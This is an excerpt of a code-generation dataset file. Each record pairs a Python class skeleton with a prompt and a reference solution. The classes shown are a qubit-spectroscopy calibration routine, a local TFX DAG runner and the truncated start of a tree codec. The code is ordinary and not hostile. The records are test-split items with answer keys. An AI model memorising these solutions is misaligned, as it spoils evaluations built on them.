qubits:\n settings['QubitSpectroscopy1D']['qubits'][qb.name] = {'freq_range': previous_qb_spec.freq_ranges[qb.name] * 2, 'freq_center': previous_qb_spec.freq_centers[qb.name], 'spec_power': previous_qb_spec.spec_powers[qb.name][1], 'pts': previous_qb_spec.pts[qb.name] * 4}\nself.add_step(*[QubitSpectroscopy1DStep, f'qubit_spectroscopy_{index_spectroscopy}_repetition_{index_iteration}', {'settings': settings, 'qubits': qubits}], index=self.current_step_index + 1)\nself.add_step(*[self.Decision, f'decision_spectroscopy_{index_spectroscopy}_repetition_{index_iteration}', {'qubits': qubits}], index=self.current_step_index + 2)"], "bodies_text": "<|body_start_0|>\n super().__init__(dev=dev, qubits=qubits, **kw)\n self.index_iteration = 1\n self.index_spectroscopy = 1\n self.previous_freqs = {qb.name: qb.ge_freq() for qb in qubits}\n self.results = {}\n self.final_init(**kw)\n<|end_body_0|>\n\n<|body_start_1|>\n super().create_routine_template()\n for i in range(self.get_param_value('n_spectroscopies', default=2)):\n qb_spec_settings = {'qubits': self.qubits}\n self.add_step(QubitSpectroscopy1DStep, f'qubit_spectroscopy_{i + 1}', qb_spec_settings)\n decision_settings = {'qubits': self.qubits}\n self.add_step(self.Decision, f'decision_spectroscopy_{i + 1}', decision_settings)\n<|end_body_1|>\n\n<|body_start_2|>\n settings = {'QubitSpectroscopy1D': {'qubits': {}}}\n if self.get_param_value('auto_repetition_settings', default=False):\n previous_qb_spec: QubitSpectroscopy1DStep = self.routine_steps[-1]\n for qb in qubits:\n settings['QubitSpectroscopy1D']['qubits'][qb.name] = {'freq_range': previous_qb_spec.freq_ranges[qb.name] * 2, 'freq_center': previous_qb_spec.freq_centers[qb.name], 'spec_power': previous_qb_spec.spec_powers[qb.name][1], 'pts': previous_qb_spec.pts[qb.name] * 4}\n self.add_step(*[QubitSpectroscopy1DStep, f'qubit_spectroscopy_{index_spectroscopy}_repetition_{index_iteration}', {'settings': settings, 'qubits': qubits}], index=self.current_step_index + 1)\n self.add_step(*[self.Decision, f'decision_spectroscopy_{index_spectroscopy}_repetition_{index_iteration}', {'qubits': qubits}], index=self.current_step_index + 2)\n<|end_body_2|>\n", "class_docstring": "Routine to find the ge transition frequency via qubit spectroscopy. A series of qubit spectroscopies is performed. A Decision step decides whether a fit failed for some qubits and whether to rerun the spectroscopy for them. The user can specify the number of spectroscopies via the keyword \"n_spectroscopies\" in the configuration parameter dictionary. The settings of each spectroscopy can be specified by using their unique label. For example, a routine with 2 spectroscopies can have the following routine steps: 1) QubitSpectroscopy1DStep (qubit_spectroscopy_): Performs a qubit spectroscopy and fits the result with a Lorentzian to extract the ge transition frequency. 2) Decision (decision_sp", "class_name": "AdaptiveQubitSpectroscopy", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AdaptiveQubitSpectroscopy:\n \"\"\"Routine to find the ge transition frequency via qubit spectroscopy. A series of qubit spectroscopies is performed. A Decision step decides whether a fit failed for some qubits and whether to rerun the spectroscopy for them. The user can specify the number of spectroscopies via the keyword \"n_spectroscopies\" in the configuration parameter dictionary. The settings of each spectroscopy can be specified by using their unique label. For example, a routine with 2 spectroscopies can have the following routine steps: 1) QubitSpectroscopy1DStep (qubit_spectroscopy_): Performs a qubit spectroscopy and fits the result with a Lorentzian to extract the ge transition frequency. 2) Decision (decision_sp\"\"\"\n\n def __init__(self, dev: Device, qubits: List[QuDev_transmon], **kw):\n \"\"\"Initialize the AdaptiveQubitSpectroscopy routine. Args: dev (Device): Device to be used for the routine qubits (list): The qubits which should be calibrated. By default, all qubits of the device are selected. Configuration parameters (coming from the configuration parameter dictionary): n_spectroscopies (int): Number of (successful) spectroscopies that will be run. max_iterations (int): Maximum number of iterations that will be performed if a spectroscopy fails. auto_repetition_settings (bool): Whether the settings of the repeated spectroscopy should be automatically set. If True, the range of the sweep and the density of the sweep points will be doubled at each repetition. max_waiting_secon\"\"\"\n <|body_0|>\n\n def create_routine_template(self):\n \"\"\"Creates the routine template for the AdaptiveQubitSpectroscopy routine.\"\"\"\n <|body_1|>\n\n def add_rerun_qubit_spectroscopy_step(self, index_spectroscopy, index_iteration, qubits):\n \"\"\"Adds a next QubitSpectroscopy1DStep followed by a Decision step Args: index_spectroscopy (int): Index of the spectroscopy whose fit failed. index_iteration (int): Index of the iteration for the spectroscopy with index `index_spectroscopy`. qubits (list): List of qubits (QuDev_transmon objects) whose spectroscopy should be run again.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(dev=dev, qubits=qubits, **kw)\n self.index_iteration = 1\n self.index_spectroscopy = 1\n self.previous_freqs = {qb.name: qb.ge_freq() for qb in qubits}\n self.results = {}\n self.final_init(**kw)\n<|end_body_0|>\n\n<|body_start_1|>\n super().create_routine_template()\n for i in range(self.get_param_value('n_spectroscopies', default=2)):\n qb_spec_settings = {'qubits': self.qubits}\n self.add_step(QubitSpectroscopy1DStep, f'qubit_spectroscopy_{i + 1}', qb_spec_settings)\n decision_settings = {'qubits': self.qubits}\n self.add_step(self.Decision, f'decision_spectroscopy_{i + 1}', decision_settings)\n<|end_body_1|>\n\n<|body_start_2|>\n settings = {'QubitSpectroscopy1D': {'qubits': {}}}\n if self.get_param_value('auto_repetition_settings', default=False):\n previous_qb_spec: QubitSpectroscopy1DStep = self.routine_steps[-1]\n for qb in qubits:\n settings['QubitSpectroscopy1D']['qubits'][qb.name] = {'freq_range': previous_qb_spec.freq_ranges[qb.name] * 2, 'freq_center': previous_qb_spec.freq_centers[qb.name], 'spec_power': previous_qb_spec.spec_powers[qb.name][1], 'pts': previous_qb_spec.pts[qb.name] * 4}\n self.add_step(*[QubitSpectroscopy1DStep, f'qubit_spectroscopy_{index_spectroscopy}_repetition_{index_iteration}', {'settings': settings, 'qubits': qubits}], index=self.current_step_index + 1)\n self.add_step(*[self.Decision, f'decision_spectroscopy_{index_spectroscopy}_repetition_{index_iteration}', {'qubits': qubits}], index=self.current_step_index + 2)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000319", "length_bytes": 24662, "license_type": "permissive", "methods": [{"docstring": "Initialize the AdaptiveQubitSpectroscopy routine. Args: dev (Device): Device to be used for the routine qubits (list): The qubits which should be calibrated. By default, all qubits of the device are selected. Configuration parameters (coming from the configuration parameter dictionary): n_spectroscopies (int): Number of (successful) spectroscopies that will be run. max_iterations (int): Maximum number of iterations that will be performed if a spectroscopy fails. auto_repetition_settings (bool): Whether the settings of the repeated spectroscopy should be automatically set. If True, the range of the sweep and the density of the sweep points will be doubled at each repetition. max_waiting_secon", "name": "__init__", "signature": "def __init__(self, dev: Device, qubits: List[QuDev_transmon], **kw)"}, {"docstring": "Creates the routine template for the AdaptiveQubitSpectroscopy routine.", "name": "create_routine_template", "signature": "def create_routine_template(self)"}, {"docstring": "Adds a next QubitSpectroscopy1DStep followed by a Decision step Args: index_spectroscopy (int): Index of the spectroscopy whose fit failed. index_iteration (int): Index of the iteration for the spectroscopy with index `index_spectroscopy`. qubits (list): List of qubits (QuDev_transmon objects) whose spectroscopy should be run again.", "name": "add_rerun_qubit_spectroscopy_step", "signature": "def add_rerun_qubit_spectroscopy_step(self, index_spectroscopy, index_iteration, qubits)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000854", "prompt": "Implement the Python class `AdaptiveQubitSpectroscopy` described below.\n\nClass description:\nRoutine to find the ge transition frequency via qubit spectroscopy. A series of qubit spectroscopies is performed. A Decision step decides whether a fit failed for some qubits and whether to rerun the spectroscopy for them. The user can specify the number of spectroscopies via the keyword \"n_spectroscopies\" in the configuration parameter dictionary. The settings of each spectroscopy can be specified by using their unique label. For example, a routine with 2 spectroscopies can have the following routine steps: 1) QubitSpectroscopy1DStep (qubit_spectroscopy_): Performs a qubit spectroscopy and fits the result with a Lorentzian to extract the ge transition frequency. 2) Decision (decision_sp\n\nMethod signatures and docstrings:\n- def __init__(self, dev: Device, qubits: List[QuDev_transmon], **kw): Initialize the AdaptiveQubitSpectroscopy routine. Args: dev (Device): Device to be used for the routine qubits (list): The qubits which should be calibrated. By default, all qubits of the device are selected. Configuration parameters (coming from the configuration parameter dictionary): n_spectroscopies (int): Number of (successful) spectroscopies that will be run. max_iterations (int): Maximum number of iterations that will be performed if a spectroscopy fails. auto_repetition_settings (bool): Whether the settings of the repeated spectroscopy should be automatically set. If True, the range of the sweep and the density of the sweep points will be doubled at each repetition. max_waiting_secon\n- def create_routine_template(self): Creates the routine template for the AdaptiveQubitSpectroscopy routine.\n- def add_rerun_qubit_spectroscopy_step(self, index_spectroscopy, index_iteration, qubits): Adds a next QubitSpectroscopy1DStep followed by a Decision step Args: index_spectroscopy (int): Index of the spectroscopy whose fit failed. index_iteration (int): Index of the iteration for the spectroscopy with index `index_spectroscopy`. qubits (list): List of qubits (QuDev_transmon objects) whose spectroscopy should be run again.", "prompted_full_text": "Implement the Python class `AdaptiveQubitSpectroscopy` described below.\n\nClass description:\nRoutine to find the ge transition frequency via qubit spectroscopy. A series of qubit spectroscopies is performed. A Decision step decides whether a fit failed for some qubits and whether to rerun the spectroscopy for them. The user can specify the number of spectroscopies via the keyword \"n_spectroscopies\" in the configuration parameter dictionary. The settings of each spectroscopy can be specified by using their unique label. For example, a routine with 2 spectroscopies can have the following routine steps: 1) QubitSpectroscopy1DStep (qubit_spectroscopy_): Performs a qubit spectroscopy and fits the result with a Lorentzian to extract the ge transition frequency. 2) Decision (decision_sp\n\nMethod signatures and docstrings:\n- def __init__(self, dev: Device, qubits: List[QuDev_transmon], **kw): Initialize the AdaptiveQubitSpectroscopy routine. Args: dev (Device): Device to be used for the routine qubits (list): The qubits which should be calibrated. By default, all qubits of the device are selected. Configuration parameters (coming from the configuration parameter dictionary): n_spectroscopies (int): Number of (successful) spectroscopies that will be run. max_iterations (int): Maximum number of iterations that will be performed if a spectroscopy fails. auto_repetition_settings (bool): Whether the settings of the repeated spectroscopy should be automatically set. If True, the range of the sweep and the density of the sweep points will be doubled at each repetition. max_waiting_secon\n- def create_routine_template(self): Creates the routine template for the AdaptiveQubitSpectroscopy routine.\n- def add_rerun_qubit_spectroscopy_step(self, index_spectroscopy, index_iteration, qubits): Adds a next QubitSpectroscopy1DStep followed by a Decision step Args: index_spectroscopy (int): Index of the spectroscopy whose fit failed. index_iteration (int): Index of the iteration for the spectroscopy with index `index_spectroscopy`. qubits (list): List of qubits (QuDev_transmon objects) whose spectroscopy should be run again.\n\n<|skeleton|>\nclass AdaptiveQubitSpectroscopy:\n \"\"\"Routine to find the ge transition frequency via qubit spectroscopy. A series of qubit spectroscopies is performed. A Decision step decides whether a fit failed for some qubits and whether to rerun the spectroscopy for them. The user can specify the number of spectroscopies via the keyword \"n_spectroscopies\" in the configuration parameter dictionary. The settings of each spectroscopy can be specified by using their unique label. For example, a routine with 2 spectroscopies can have the following routine steps: 1) QubitSpectroscopy1DStep (qubit_spectroscopy_): Performs a qubit spectroscopy and fits the result with a Lorentzian to extract the ge transition frequency. 2) Decision (decision_sp\"\"\"\n\n def __init__(self, dev: Device, qubits: List[QuDev_transmon], **kw):\n \"\"\"Initialize the AdaptiveQubitSpectroscopy routine. Args: dev (Device): Device to be used for the routine qubits (list): The qubits which should be calibrated. By default, all qubits of the device are selected. Configuration parameters (coming from the configuration parameter dictionary): n_spectroscopies (int): Number of (successful) spectroscopies that will be run. max_iterations (int): Maximum number of iterations that will be performed if a spectroscopy fails. auto_repetition_settings (bool): Whether the settings of the repeated spectroscopy should be automatically set. If True, the range of the sweep and the density of the sweep points will be doubled at each repetition. max_waiting_secon\"\"\"\n <|body_0|>\n\n def create_routine_template(self):\n \"\"\"Creates the routine template for the AdaptiveQubitSpectroscopy routine.\"\"\"\n <|body_1|>\n\n def add_rerun_qubit_spectroscopy_step(self, index_spectroscopy, index_iteration, qubits):\n \"\"\"Adds a next QubitSpectroscopy1DStep followed by a Decision step Args: index_spectroscopy (int): Index of the spectroscopy whose fit failed. index_iteration (int): Index of the iteration for the spectroscopy with index `index_spectroscopy`. qubits (list): List of qubits (QuDev_transmon objects) whose spectroscopy should be run again.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(dev=dev, qubits=qubits, **kw)\n self.index_iteration = 1\n self.index_spectroscopy = 1\n self.previous_freqs = {qb.name: qb.ge_freq() for qb in qubits}\n self.results = {}\n self.final_init(**kw)\n<|end_body_0|>\n\n<|body_start_1|>\n super().create_routine_template()\n for i in range(self.get_param_value('n_spectroscopies', default=2)):\n qb_spec_settings = {'qubits': self.qubits}\n self.add_step(QubitSpectroscopy1DStep, f'qubit_spectroscopy_{i + 1}', qb_spec_settings)\n decision_settings = {'qubits': self.qubits}\n self.add_step(self.Decision, f'decision_spectroscopy_{i + 1}', decision_settings)\n<|end_body_1|>\n\n<|body_start_2|>\n settings = {'QubitSpectroscopy1D': {'qubits': {}}}\n if self.get_param_value('auto_repetition_settings', default=False):\n previous_qb_spec: QubitSpectroscopy1DStep = self.routine_steps[-1]\n for qb in qubits:\n settings['QubitSpectroscopy1D']['qubits'][qb.name] = {'freq_range': previous_qb_spec.freq_ranges[qb.name] * 2, 'freq_center': previous_qb_spec.freq_centers[qb.name], 'spec_power': previous_qb_spec.spec_powers[qb.name][1], 'pts': previous_qb_spec.pts[qb.name] * 4}\n self.add_step(*[QubitSpectroscopy1DStep, f'qubit_spectroscopy_{index_spectroscopy}_repetition_{index_iteration}', {'settings': settings, 'qubits': qubits}], index=self.current_step_index + 1)\n self.add_step(*[self.Decision, f'decision_spectroscopy_{index_spectroscopy}_repetition_{index_iteration}', {'qubits': qubits}], index=self.current_step_index + 2)\n<|end_body_2|>\n", "revision_id": "bc6733d774fe31a23f4c7e73e5eb0beed8d30e7d", "skeleton": "<|skeleton|>\nclass AdaptiveQubitSpectroscopy:\n \"\"\"Routine to find the ge transition frequency via qubit spectroscopy. A series of qubit spectroscopies is performed. A Decision step decides whether a fit failed for some qubits and whether to rerun the spectroscopy for them. The user can specify the number of spectroscopies via the keyword \"n_spectroscopies\" in the configuration parameter dictionary. The settings of each spectroscopy can be specified by using their unique label. For example, a routine with 2 spectroscopies can have the following routine steps: 1) QubitSpectroscopy1DStep (qubit_spectroscopy_): Performs a qubit spectroscopy and fits the result with a Lorentzian to extract the ge transition frequency. 2) Decision (decision_sp\"\"\"\n\n def __init__(self, dev: Device, qubits: List[QuDev_transmon], **kw):\n \"\"\"Initialize the AdaptiveQubitSpectroscopy routine. Args: dev (Device): Device to be used for the routine qubits (list): The qubits which should be calibrated. By default, all qubits of the device are selected. Configuration parameters (coming from the configuration parameter dictionary): n_spectroscopies (int): Number of (successful) spectroscopies that will be run. max_iterations (int): Maximum number of iterations that will be performed if a spectroscopy fails. auto_repetition_settings (bool): Whether the settings of the repeated spectroscopy should be automatically set. If True, the range of the sweep and the density of the sweep points will be doubled at each repetition. max_waiting_secon\"\"\"\n <|body_0|>\n\n def create_routine_template(self):\n \"\"\"Creates the routine template for the AdaptiveQubitSpectroscopy routine.\"\"\"\n <|body_1|>\n\n def add_rerun_qubit_spectroscopy_step(self, index_spectroscopy, index_iteration, qubits):\n \"\"\"Adds a next QubitSpectroscopy1DStep followed by a Decision step Args: index_spectroscopy (int): Index of the spectroscopy whose fit failed. index_iteration (int): Index of the iteration for the spectroscopy with index `index_spectroscopy`. qubits (list): List of qubits (QuDev_transmon objects) whose spectroscopy should be run again.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AdaptiveQubitSpectroscopy:\n \"\"\"Routine to find the ge transition frequency via qubit spectroscopy. A series of qubit spectroscopies is performed. A Decision step decides whether a fit failed for some qubits and whether to rerun the spectroscopy for them. The user can specify the number of spectroscopies via the keyword \"n_spectroscopies\" in the configuration parameter dictionary. The settings of each spectroscopy can be specified by using their unique label. For example, a routine with 2 spectroscopies can have the following routine steps: 1) QubitSpectroscopy1DStep (qubit_spectroscopy_): Performs a qubit spectroscopy and fits the result with a Lorentzian to extract the ge transition frequency. 2) Decision (decision_sp\"\"\"\n\n def __init__(self, dev: Device, qubits: List[QuDev_transmon], **kw):\n \"\"\"Initialize the AdaptiveQubitSpectroscopy routine. Args: dev (Device): Device to be used for the routine qubits (list): The qubits which should be calibrated. By default, all qubits of the device are selected. Configuration parameters (coming from the configuration parameter dictionary): n_spectroscopies (int): Number of (successful) spectroscopies that will be run. max_iterations (int): Maximum number of iterations that will be performed if a spectroscopy fails. auto_repetition_settings (bool): Whether the settings of the repeated spectroscopy should be automatically set. If True, the range of the sweep and the density of the sweep points will be doubled at each repetition. max_waiting_secon\"\"\"\n super().__init__(dev=dev, qubits=qubits, **kw)\n self.index_iteration = 1\n self.index_spectroscopy = 1\n self.previous_freqs = {qb.name: qb.ge_freq() for qb in qubits}\n self.results = {}\n self.final_init(**kw)\n\n def create_routine_template(self):\n \"\"\"Creates the routine template for the AdaptiveQubitSpectroscopy routine.\"\"\"\n super().create_routine_template()\n for i in range(self.get_param_value('n_spectroscopies', default=2)):\n qb_spec_settings = {'qubits': self.qubits}\n self.add_step(QubitSpectroscopy1DStep, f'qubit_spectroscopy_{i + 1}', qb_spec_settings)\n decision_settings = {'qubits': self.qubits}\n self.add_step(self.Decision, f'decision_spectroscopy_{i + 1}', decision_settings)\n\n def add_rerun_qubit_spectroscopy_step(self, index_spectroscopy, index_iteration, qubits):\n \"\"\"Adds a next QubitSpectroscopy1DStep followed by a Decision step Args: index_spectroscopy (int): Index of the spectroscopy whose fit failed. index_iteration (int): Index of the iteration for the spectroscopy with index `index_spectroscopy`. qubits (list): List of qubits (QuDev_transmon objects) whose spectroscopy should be run again.\"\"\"\n settings = {'QubitSpectroscopy1D': {'qubits': {}}}\n if self.get_param_value('auto_repetition_settings', default=False):\n previous_qb_spec: QubitSpectroscopy1DStep = self.routine_steps[-1]\n for qb in qubits:\n settings['QubitSpectroscopy1D']['qubits'][qb.name] = {'freq_range': previous_qb_spec.freq_ranges[qb.name] * 2, 'freq_center': previous_qb_spec.freq_centers[qb.name], 'spec_power': previous_qb_spec.spec_powers[qb.name][1], 'pts': previous_qb_spec.pts[qb.name] * 4}\n self.add_step(*[QubitSpectroscopy1DStep, f'qubit_spectroscopy_{index_spectroscopy}_repetition_{index_iteration}', {'settings': settings, 'qubits': qubits}], index=self.current_step_index + 1)\n self.add_step(*[self.Decision, f'decision_spectroscopy_{index_spectroscopy}_repetition_{index_iteration}', {'qubits': qubits}], index=self.current_step_index + 2)\n", "source": "the_stack_v2_python_sparse", "source_path": "pycqed/measurement/calibration/automatic_calibration_routines/adaptive_qubit_spectroscopy.py", "source_repo": "QudevETH/PycQED_py3", "split": "test", "star_events_count": 8} {"blob_id": "39a05543fcc027b0f8ccff1d41cdcf95b12d7ff2", "bodies": ["if config is None:\n config = pipeline_config.PipelineConfig(supported_launcher_classes=[in_process_component_launcher.InProcessComponentLauncher, docker_component_launcher.DockerComponentLauncher])\nsuper().__init__(config)", "tfx_pipeline.pipeline_info.run_id = datetime.datetime.now().isoformat()\nwith telemetry_utils.scoped_labels({telemetry_utils.LABEL_TFX_RUNNER: 'local'}):\n for component in tfx_pipeline.components:\n if isinstance(component, base_component.BaseComponent):\n component._resolve_pip_dependencies(tfx_pipeline.pipeline_info.pipeline_root)\n component_launcher_class, component_config = config_utils.find_component_launch_info(self._config, component)\n driver_args = data_types.DriverArgs(enable_cache=tfx_pipeline.enable_cache)\n metadata_connection = metadata.Metadata(tfx_pipeline.metadata_connection_config)\n node_launcher = component_launcher_class.create(component=component, pipeline_info=tfx_pipeline.pipeline_info, driver_args=driver_args, metadata_connection=metadata_connection, beam_pipeline_args=tfx_pipeline.beam_pipeline_args, additional_pipeline_args=tfx_pipeline.additional_pipeline_args, component_config=component_config)\n logging.info('Component %s is running.', component.id)\n node_launcher.launch()\n logging.info('Component %s is finished.', component.id)"], "bodies_text": "<|body_start_0|>\n if config is None:\n config = pipeline_config.PipelineConfig(supported_launcher_classes=[in_process_component_launcher.InProcessComponentLauncher, docker_component_launcher.DockerComponentLauncher])\n super().__init__(config)\n<|end_body_0|>\n\n<|body_start_1|>\n tfx_pipeline.pipeline_info.run_id = datetime.datetime.now().isoformat()\n with telemetry_utils.scoped_labels({telemetry_utils.LABEL_TFX_RUNNER: 'local'}):\n for component in tfx_pipeline.components:\n if isinstance(component, base_component.BaseComponent):\n component._resolve_pip_dependencies(tfx_pipeline.pipeline_info.pipeline_root)\n component_launcher_class, component_config = config_utils.find_component_launch_info(self._config, component)\n driver_args = data_types.DriverArgs(enable_cache=tfx_pipeline.enable_cache)\n metadata_connection = metadata.Metadata(tfx_pipeline.metadata_connection_config)\n node_launcher = component_launcher_class.create(component=component, pipeline_info=tfx_pipeline.pipeline_info, driver_args=driver_args, metadata_connection=metadata_connection, beam_pipeline_args=tfx_pipeline.beam_pipeline_args, additional_pipeline_args=tfx_pipeline.additional_pipeline_args, component_config=component_config)\n logging.info('Component %s is running.', component.id)\n node_launcher.launch()\n logging.info('Component %s is finished.', component.id)\n<|end_body_1|>\n", "class_docstring": "Local TFX DAG runner.", "class_name": "LocalDagRunner", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LocalDagRunner:\n \"\"\"Local TFX DAG runner.\"\"\"\n\n def __init__(self, config: Optional[pipeline_config.PipelineConfig]=None):\n \"\"\"Initializes local TFX orchestrator. Args: config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\"\"\"\n <|body_0|>\n\n def run(self, tfx_pipeline: pipeline.Pipeline) -> None:\n \"\"\"Runs given logical pipeline locally. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if config is None:\n config = pipeline_config.PipelineConfig(supported_launcher_classes=[in_process_component_launcher.InProcessComponentLauncher, docker_component_launcher.DockerComponentLauncher])\n super().__init__(config)\n<|end_body_0|>\n\n<|body_start_1|>\n tfx_pipeline.pipeline_info.run_id = datetime.datetime.now().isoformat()\n with telemetry_utils.scoped_labels({telemetry_utils.LABEL_TFX_RUNNER: 'local'}):\n for component in tfx_pipeline.components:\n if isinstance(component, base_component.BaseComponent):\n component._resolve_pip_dependencies(tfx_pipeline.pipeline_info.pipeline_root)\n component_launcher_class, component_config = config_utils.find_component_launch_info(self._config, component)\n driver_args = data_types.DriverArgs(enable_cache=tfx_pipeline.enable_cache)\n metadata_connection = metadata.Metadata(tfx_pipeline.metadata_connection_config)\n node_launcher = component_launcher_class.create(component=component, pipeline_info=tfx_pipeline.pipeline_info, driver_args=driver_args, metadata_connection=metadata_connection, beam_pipeline_args=tfx_pipeline.beam_pipeline_args, additional_pipeline_args=tfx_pipeline.additional_pipeline_args, component_config=component_config)\n logging.info('Component %s is running.', component.id)\n node_launcher.launch()\n logging.info('Component %s is finished.', component.id)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000320", "length_bytes": 3897, "license_type": "permissive", "methods": [{"docstring": "Initializes local TFX orchestrator. Args: config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.", "name": "__init__", "signature": "def __init__(self, config: Optional[pipeline_config.PipelineConfig]=None)"}, {"docstring": "Runs given logical pipeline locally. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.", "name": "run", "signature": "def run(self, tfx_pipeline: pipeline.Pipeline) -> None"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004096", "prompt": "Implement the Python class `LocalDagRunner` described below.\n\nClass description:\nLocal TFX DAG runner.\n\nMethod signatures and docstrings:\n- def __init__(self, config: Optional[pipeline_config.PipelineConfig]=None): Initializes local TFX orchestrator. Args: config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\n- def run(self, tfx_pipeline: pipeline.Pipeline) -> None: Runs given logical pipeline locally. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.", "prompted_full_text": "Implement the Python class `LocalDagRunner` described below.\n\nClass description:\nLocal TFX DAG runner.\n\nMethod signatures and docstrings:\n- def __init__(self, config: Optional[pipeline_config.PipelineConfig]=None): Initializes local TFX orchestrator. Args: config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\n- def run(self, tfx_pipeline: pipeline.Pipeline) -> None: Runs given logical pipeline locally. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.\n\n<|skeleton|>\nclass LocalDagRunner:\n \"\"\"Local TFX DAG runner.\"\"\"\n\n def __init__(self, config: Optional[pipeline_config.PipelineConfig]=None):\n \"\"\"Initializes local TFX orchestrator. Args: config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\"\"\"\n <|body_0|>\n\n def run(self, tfx_pipeline: pipeline.Pipeline) -> None:\n \"\"\"Runs given logical pipeline locally. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if config is None:\n config = pipeline_config.PipelineConfig(supported_launcher_classes=[in_process_component_launcher.InProcessComponentLauncher, docker_component_launcher.DockerComponentLauncher])\n super().__init__(config)\n<|end_body_0|>\n\n<|body_start_1|>\n tfx_pipeline.pipeline_info.run_id = datetime.datetime.now().isoformat()\n with telemetry_utils.scoped_labels({telemetry_utils.LABEL_TFX_RUNNER: 'local'}):\n for component in tfx_pipeline.components:\n if isinstance(component, base_component.BaseComponent):\n component._resolve_pip_dependencies(tfx_pipeline.pipeline_info.pipeline_root)\n component_launcher_class, component_config = config_utils.find_component_launch_info(self._config, component)\n driver_args = data_types.DriverArgs(enable_cache=tfx_pipeline.enable_cache)\n metadata_connection = metadata.Metadata(tfx_pipeline.metadata_connection_config)\n node_launcher = component_launcher_class.create(component=component, pipeline_info=tfx_pipeline.pipeline_info, driver_args=driver_args, metadata_connection=metadata_connection, beam_pipeline_args=tfx_pipeline.beam_pipeline_args, additional_pipeline_args=tfx_pipeline.additional_pipeline_args, component_config=component_config)\n logging.info('Component %s is running.', component.id)\n node_launcher.launch()\n logging.info('Component %s is finished.', component.id)\n<|end_body_1|>\n", "revision_id": "1b328504fa08a70388691e4072df76f143631325", "skeleton": "<|skeleton|>\nclass LocalDagRunner:\n \"\"\"Local TFX DAG runner.\"\"\"\n\n def __init__(self, config: Optional[pipeline_config.PipelineConfig]=None):\n \"\"\"Initializes local TFX orchestrator. Args: config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\"\"\"\n <|body_0|>\n\n def run(self, tfx_pipeline: pipeline.Pipeline) -> None:\n \"\"\"Runs given logical pipeline locally. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LocalDagRunner:\n \"\"\"Local TFX DAG runner.\"\"\"\n\n def __init__(self, config: Optional[pipeline_config.PipelineConfig]=None):\n \"\"\"Initializes local TFX orchestrator. Args: config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\"\"\"\n if config is None:\n config = pipeline_config.PipelineConfig(supported_launcher_classes=[in_process_component_launcher.InProcessComponentLauncher, docker_component_launcher.DockerComponentLauncher])\n super().__init__(config)\n\n def run(self, tfx_pipeline: pipeline.Pipeline) -> None:\n \"\"\"Runs given logical pipeline locally. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.\"\"\"\n tfx_pipeline.pipeline_info.run_id = datetime.datetime.now().isoformat()\n with telemetry_utils.scoped_labels({telemetry_utils.LABEL_TFX_RUNNER: 'local'}):\n for component in tfx_pipeline.components:\n if isinstance(component, base_component.BaseComponent):\n component._resolve_pip_dependencies(tfx_pipeline.pipeline_info.pipeline_root)\n component_launcher_class, component_config = config_utils.find_component_launch_info(self._config, component)\n driver_args = data_types.DriverArgs(enable_cache=tfx_pipeline.enable_cache)\n metadata_connection = metadata.Metadata(tfx_pipeline.metadata_connection_config)\n node_launcher = component_launcher_class.create(component=component, pipeline_info=tfx_pipeline.pipeline_info, driver_args=driver_args, metadata_connection=metadata_connection, beam_pipeline_args=tfx_pipeline.beam_pipeline_args, additional_pipeline_args=tfx_pipeline.additional_pipeline_args, component_config=component_config)\n logging.info('Component %s is running.', component.id)\n node_launcher.launch()\n logging.info('Component %s is finished.', component.id)\n", "source": "the_stack_v2_python_sparse", "source_path": "tfx/orchestration/local/legacy/local_dag_runner.py", "source_repo": "tensorflow/tfx", "split": "test", "star_events_count": 2116} {"blob_id": "0303d05288fcc9821ea2cc34833b42ce20c68f68", "bodies": ["def helper(node):\n if not node:\n return ''\n if not node.children:\n return str(node.val)\n res = str(node.val) + '['\n for i in range(len(node.children) - 1):\n res += helper(node.children[i])\n res += ' '\n res += helper(node.children[-1])\n res += ']'\n return res\nstring = helper(root)\nreturn string", "if not data:\n return None\nstart = 0\nwhile start < len(data) and data[start] != '[':\n start += 1\nroot = Node(int(data[:start]), [])\nnew_str = []\ncount = 0\nleft = start + 1\nfor i, char in enumerate(data[start + 1:-1]):\n if char == '[':\n count += 1\n elif char == ']':\n count -= 1\n elif char == ' ':\n if count == 0:\n new_str.append(data[left:i + start + 1])\n left = i + 2 + start\nif data[left:-1] != '':\n new_str.append(data[left:-1])\nfor sub_str 